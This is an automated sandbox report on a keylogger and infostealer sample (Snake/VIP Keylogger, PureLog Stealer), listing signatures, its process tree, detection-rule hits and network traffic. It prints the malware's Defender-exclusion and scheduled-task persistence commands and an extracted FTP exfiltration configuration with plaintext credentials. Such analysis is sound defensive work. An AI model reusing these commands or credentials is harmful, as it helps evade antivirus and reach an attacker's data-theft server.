Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Ti5nuRV7y4.exe

Overview

General Information

Sample name:Ti5nuRV7y4.exe
renamed because original name is a hash value
Original sample name:228e6f4564fe08c94660250de5fc8832ce73b21edad1e81f6969c9a6dedbbfa9.exe
Analysis ID:1569417
MD5:3c70df024ff5a65f0785b0075939c3fd
SHA1:05d7f92c1a6fec90ba6ab3a9b08944adbfe36832
SHA256:228e6f4564fe08c94660250de5fc8832ce73b21edad1e81f6969c9a6dedbbfa9
Tags:exeSnakeKeyloggeruser-adrian__luca
Infos:

Detection

PureLog Stealer, Snake Keylogger, VIP Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Yara detected AntiVM3
Yara detected PureLog Stealer
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Uses the Telegram API (likely for C&C communication)
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • Ti5nuRV7y4.exe (PID: 792 cmdline: "C:\Users\user\Desktop\Ti5nuRV7y4.exe" MD5: 3C70DF024FF5A65F0785B0075939C3FD)
    • powershell.exe (PID: 6132 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Ti5nuRV7y4.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 5884 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 6404 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\aoTiGLRa.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 2064 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7480 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 400 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\aoTiGLRa" /XML "C:\Users\user\AppData\Local\Temp\tmpD06F.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 1648 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • Ti5nuRV7y4.exe (PID: 7308 cmdline: "C:\Users\user\Desktop\Ti5nuRV7y4.exe" MD5: 3C70DF024FF5A65F0785B0075939C3FD)
  • aoTiGLRa.exe (PID: 7560 cmdline: C:\Users\user\AppData\Roaming\aoTiGLRa.exe MD5: 3C70DF024FF5A65F0785B0075939C3FD)
    • schtasks.exe (PID: 7676 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\aoTiGLRa" /XML "C:\Users\user\AppData\Local\Temp\tmpECC1.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7684 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • aoTiGLRa.exe (PID: 7728 cmdline: "C:\Users\user\AppData\Roaming\aoTiGLRa.exe" MD5: 3C70DF024FF5A65F0785B0075939C3FD)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"Exfil Mode": "FTP", "Username": "anonymous_log@kashmirestore.com", "Password": "c%P+6,(]YFvP", "FTP Server": "ftp://kashmirestore.com/", "Version": "4.4"}
SourceRuleDescriptionAuthorStrings
00000000.00000002.1316105655.0000000007340000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
    0000000E.00000002.3699461711.00000000033D4000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
      00000014.00000002.3695367843.0000000000430000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000014.00000002.3695367843.0000000000430000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
          00000014.00000002.3695367843.0000000000430000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
            Click to see the 19 entries
            SourceRuleDescriptionAuthorStrings
            0.2.Ti5nuRV7y4.exe.7340000.3.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
              0.2.Ti5nuRV7y4.exe.7340000.3.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                20.2.aoTiGLRa.exe.400000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                  20.2.aoTiGLRa.exe.400000.0.unpackJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
                    20.2.aoTiGLRa.exe.400000.0.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                      Click to see the 21 entries

                      System Summary

                      barindex
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Ti5nuRV7y4.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Ti5nuRV7y4.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Ti5nuRV7y4.exe", ParentImage: C:\Users\user\Desktop\Ti5nuRV7y4.exe, ParentProcessId: 792, ParentProcessName: Ti5nuRV7y4.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Ti5nuRV7y4.exe", ProcessId: 6132, ProcessName: powershell.exe
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Ti5nuRV7y4.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Ti5nuRV7y4.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Ti5nuRV7y4.exe", ParentImage: C:\Users\user\Desktop\Ti5nuRV7y4.exe, ParentProcessId: 792, ParentProcessName: Ti5nuRV7y4.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Ti5nuRV7y4.exe", ProcessId: 6132, ProcessName: powershell.exe
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\aoTiGLRa" /XML "C:\Users\user\AppData\Local\Temp\tmpECC1.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\aoTiGLRa" /XML "C:\Users\user\AppData\Local\Temp\tmpECC1.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\aoTiGLRa.exe, ParentImage: C:\Users\user\AppData\Roaming\aoTiGLRa.exe, ParentProcessId: 7560, ParentProcessName: aoTiGLRa.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\aoTiGLRa" /XML "C:\Users\user\AppData\Local\Temp\tmpECC1.tmp", ProcessId: 7676, ProcessName: schtasks.exe
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\aoTiGLRa" /XML "C:\Users\user\AppData\Local\Temp\tmpD06F.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\aoTiGLRa" /XML "C:\Users\user\AppData\Local\Temp\tmpD06F.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Ti5nuRV7y4.exe", ParentImage: C:\Users\user\Desktop\Ti5nuRV7y4.exe, ParentProcessId: 792, ParentProcessName: Ti5nuRV7y4.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\aoTiGLRa" /XML "C:\Users\user\AppData\Local\Temp\tmpD06F.tmp", ProcessId: 400, ProcessName: schtasks.exe
                      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Ti5nuRV7y4.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Ti5nuRV7y4.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Ti5nuRV7y4.exe", ParentImage: C:\Users\user\Desktop\Ti5nuRV7y4.exe, ParentProcessId: 792, ParentProcessName: Ti5nuRV7y4.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Ti5nuRV7y4.exe", ProcessId: 6132, ProcessName: powershell.exe

                      Persistence and Installation Behavior

                      barindex
                      Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\aoTiGLRa" /XML "C:\Users\user\AppData\Local\Temp\tmpD06F.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\aoTiGLRa" /XML "C:\Users\user\AppData\Local\Temp\tmpD06F.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Ti5nuRV7y4.exe", ParentImage: C:\Users\user\Desktop\Ti5nuRV7y4.exe, ParentProcessId: 792, ParentProcessName: Ti5nuRV7y4.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\aoTiGLRa" /XML "C:\Users\user\AppData\Local\Temp\tmpD06F.tmp", ProcessId: 400, ProcessName: schtasks.exe
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-12-05T18:51:15.131908+010028033053Unknown Traffic192.168.2.749707104.21.67.152443TCP
                      2024-12-05T18:51:18.372397+010028033053Unknown Traffic192.168.2.749715104.21.67.152443TCP
                      2024-12-05T18:51:21.581396+010028033053Unknown Traffic192.168.2.749724104.21.67.152443TCP
                      2024-12-05T18:51:24.831550+010028033053Unknown Traffic192.168.2.749741104.21.67.152443TCP
                      2024-12-05T18:51:28.140597+010028033053Unknown Traffic192.168.2.749753104.21.67.152443TCP
                      2024-12-05T18:51:28.152616+010028033053Unknown Traffic192.168.2.749752104.21.67.152443TCP
                      2024-12-05T18:51:37.951473+010028033053Unknown Traffic192.168.2.749788104.21.67.152443TCP
                      2024-12-05T18:51:44.852421+010028033053Unknown Traffic192.168.2.749809104.21.67.152443TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-12-05T18:51:11.090059+010028032742Potentially Bad Traffic192.168.2.749703132.226.8.16980TCP
                      2024-12-05T18:51:13.480698+010028032742Potentially Bad Traffic192.168.2.749703132.226.8.16980TCP
                      2024-12-05T18:51:16.715089+010028032742Potentially Bad Traffic192.168.2.749708132.226.8.16980TCP
                      2024-12-05T18:51:17.699485+010028032742Potentially Bad Traffic192.168.2.749714132.226.8.16980TCP
                      2024-12-05T18:51:19.949509+010028032742Potentially Bad Traffic192.168.2.749714132.226.8.16980TCP
                      2024-12-05T18:51:23.168230+010028032742Potentially Bad Traffic192.168.2.749732132.226.8.16980TCP

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Source: 0.2.Ti5nuRV7y4.exe.3fe9970.1.raw.unpackMalware Configuration Extractor: VIP Keylogger {"Exfil Mode": "FTP", "Username": "anonymous_log@kashmirestore.com", "Password": "c%P+6,(]YFvP", "FTP Server": "ftp://kashmirestore.com/", "Version": "4.4"}
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeReversingLabs: Detection: 63%
                      Source: Ti5nuRV7y4.exeReversingLabs: Detection: 63%
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeJoe Sandbox ML: detected
                      Source: Ti5nuRV7y4.exeJoe Sandbox ML: detected

                      Location Tracking

                      barindex
                      Source: unknownDNS query: name: reallyfreegeoip.org
                      Source: Ti5nuRV7y4.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: unknownHTTPS traffic detected: 104.21.67.152:443 -> 192.168.2.7:49705 version: TLS 1.0
                      Source: unknownHTTPS traffic detected: 104.21.67.152:443 -> 192.168.2.7:49716 version: TLS 1.0
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49795 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49815 version: TLS 1.2
                      Source: Ti5nuRV7y4.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeCode function: 4x nop then jmp 076FCB4Eh0_2_076FC372
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeCode function: 4x nop then jmp 076FCB4Eh0_2_076FC2D4
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeCode function: 4x nop then jmp 0174F45Dh14_2_0174F2C0
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeCode function: 4x nop then jmp 0174F45Dh14_2_0174F4AC
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeCode function: 4x nop then jmp 0174FC19h14_2_0174F961
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeCode function: 4x nop then jmp 06CC31E0h14_2_06CC2DC8
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeCode function: 4x nop then jmp 06CC0D0Dh14_2_06CC0B30
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeCode function: 4x nop then jmp 06CC1697h14_2_06CC0B30
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeCode function: 4x nop then jmp 06CC2C19h14_2_06CC2968
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeCode function: 4x nop then jmp 06CCE959h14_2_06CCE6B0
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeCode function: 4x nop then jmp 06CCE0A9h14_2_06CCDE00
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeCode function: 4x nop then jmp 06CCF209h14_2_06CCEF60
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeCode function: 4x nop then jmp 06CCCF49h14_2_06CCCCA0
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeCode function: 4x nop then jmp 06CC31E0h14_2_06CC2DB8
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeCode function: 4x nop then jmp 06CCD7F9h14_2_06CCD550
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeCode function: 4x nop then jmp 06CCE501h14_2_06CCE258
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeCode function: 4x nop then jmp 06CCF661h14_2_06CCF3B8
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeCode function: 4x nop then jmp 06CCEDB1h14_2_06CCEB08
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeCode function: 4x nop then jmp 06CCD3A1h14_2_06CCD0F8
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h14_2_06CC0040
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeCode function: 4x nop then jmp 06CCFAB9h14_2_06CCF810
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeCode function: 4x nop then jmp 06CCDC51h14_2_06CCD9A8
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeCode function: 4x nop then jmp 06CC31E0h14_2_06CC310E
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 4x nop then jmp 01482C19h20_2_01482968
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 4x nop then jmp 014831E0h20_2_01482DC8
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 4x nop then jmp 01480D0Dh20_2_01480B30
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 4x nop then jmp 01481697h20_2_01480B30
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 4x nop then jmp 0148E501h20_2_0148E258
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 4x nop then jmp 0148D7F9h20_2_0148D550
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 4x nop then jmp 014831E0h20_2_0148310E
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 4x nop then jmp 0148DC51h20_2_0148D9A8
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h20_2_01480040
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h20_2_01480853
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 4x nop then jmp 0148FAB9h20_2_0148F810
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 4x nop then jmp 0148D3A1h20_2_0148D0F8
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 4x nop then jmp 0148CF49h20_2_0148CCA0
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 4x nop then jmp 0148F209h20_2_0148EF60
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 4x nop then jmp 0148EDB1h20_2_0148EB08
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 4x nop then jmp 0148F661h20_2_0148F3B8
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h20_2_01480673
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 4x nop then jmp 0148E0A9h20_2_0148DE00
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 4x nop then jmp 0148E959h20_2_0148E6B0
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 4x nop then jmp 015AE816h20_2_015AE548
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 4x nop then jmp 015A7EB5h20_2_015A7B78
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 4x nop then jmp 015A79C9h20_2_015A7720
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 4x nop then jmp 015A9280h20_2_015A8FB0
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 4x nop then jmp 015AC826h20_2_015AC558
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 4x nop then jmp 015A0FF1h20_2_015A0D48
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 4x nop then jmp 015AECA6h20_2_015AE9D8
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 4x nop then jmp 015A18A1h20_2_015A15F8
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 4x nop then jmp 015ACCB6h20_2_015AC9E8
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 4x nop then jmp 015A1449h20_2_015A11A0
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 4x nop then jmp 015A02E9h20_2_015A0040
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 4x nop then jmp 015A3709h20_2_015A3460
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 4x nop then jmp 015A32B1h20_2_015A3008
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 4x nop then jmp 015ABF06h20_2_015ABC38
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 4x nop then jmp 015A62D9h20_2_015A6030
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 4x nop then jmp 015ADEF6h20_2_015ADC28
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 4x nop then jmp 015AC396h20_2_015AC0C8
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 4x nop then jmp 015A0B99h20_2_015A08F0
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 4x nop then jmp 015A0741h20_2_015A0498
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 4x nop then jmp 015A6733h20_2_015A6488
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 4x nop then mov esp, ebp20_2_015AB081
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 4x nop then jmp 015AE386h20_2_015AE0B8
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 4x nop then jmp 015A2A01h20_2_015A2758
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 4x nop then jmp 015AB5E6h20_2_015AB318
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 4x nop then jmp 015AD5D6h20_2_015AD308
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 4x nop then jmp 015A25A9h20_2_015A2300
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 4x nop then jmp 015A55D1h20_2_015A5328
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 4x nop then jmp 015A5E81h20_2_015A5BD8
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 4x nop then jmp 015ADA66h20_2_015AD798
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 4x nop then jmp 015AFA56h20_2_015AF788
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 4x nop then jmp 015A5A29h20_2_015A5780
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 4x nop then jmp 015A2E59h20_2_015A2BB0
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 4x nop then jmp 015ABA76h20_2_015AB7A8
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 4x nop then jmp 015A1CF9h20_2_015A1A50
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 4x nop then jmp 015A4D21h20_2_015A4A78
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 4x nop then jmp 015AD146h20_2_015ACE78
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 4x nop then jmp 015A7119h20_2_015A6E70
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 4x nop then jmp 015AF136h20_2_015AEE68
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 4x nop then jmp 015A6CC1h20_2_015A6A18
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 4x nop then jmp 015A48C9h20_2_015A4620
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 4x nop then jmp 015A5179h20_2_015A4ED0
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 4x nop then jmp 015A7571h20_2_015A72C8
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 4x nop then jmp 015AF5C6h20_2_015AF2F8
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 4x nop then jmp 015A2151h20_2_015A1EA8
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]20_2_01660DD0
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]20_2_01660C9E
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]20_2_016610E6
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 4x nop then push 00000000h20_2_01665487
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 4x nop then jmp 032EF45Dh20_2_032EF2C0
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 4x nop then jmp 032EF45Dh20_2_032EF4AC
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeCode function: 4x nop then jmp 032EFC19h20_2_032EF974

                      Networking

                      barindex
                      Source: unknownDNS query: name: api.telegram.org
                      Source: Yara matchFile source: 0.2.Ti5nuRV7y4.exe.40ccd48.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Ti5nuRV7y4.exe.3fe9970.1.raw.unpack, type: UNPACKEDPE
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.228 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.228 HTTP/1.1Host: reallyfreegeoip.org
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.228 HTTP/1.1Host: reallyfreegeoip.org
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.228 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.228 HTTP/1.1Host: reallyfreegeoip.org
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.228 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.228 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.228 HTTP/1.1Host: reallyfreegeoip.org
